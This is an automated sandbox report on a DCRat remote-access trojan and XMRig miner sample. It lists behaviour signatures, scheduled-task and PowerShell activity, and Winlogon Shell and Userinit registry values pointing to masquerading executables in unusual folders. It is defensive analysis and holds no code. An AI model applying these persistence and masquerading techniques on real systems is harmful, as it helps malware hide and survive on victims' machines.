Malware Analysis Report

2024-11-15 05:52

Sample ID 240721-y6s92avgqn
Target 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab
SHA256 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab
Tags
rat dcrat execution infostealer persistence privilege_escalation spyware stealer xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab

Threat Level: Known bad

The file 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab was found to be: Known bad.

Malicious Activity Summary

rat dcrat execution infostealer persistence privilege_escalation spyware stealer xmrig miner

DCRat payload

Process spawned unexpected child process

Dcrat family

Modifies WinLogon for persistence

xmrig

DcRat

XMRig Miner payload

DCRat payload

Command and Scripting Interpreter: PowerShell

Event Triggered Execution: AppInit DLLs

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

.NET Reactor proctector

Reads user/profile data of web browsers

Looks up external IP address via web service

Adds Run key to start application

Blocklisted process makes network request

Enumerates connected drives

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies system certificate store

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Modifies registry class

Runs ping.exe

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-21 20:24

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-21 20:24

Reported

2024-07-21 20:26

Platform

win7-20240704-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Office\14.0\Common C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\", \"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\xdwdSublime Text.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\", \"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Roblox.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\", \"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Event Triggered Execution: AppInit DLLs

persistence privilege_escalation

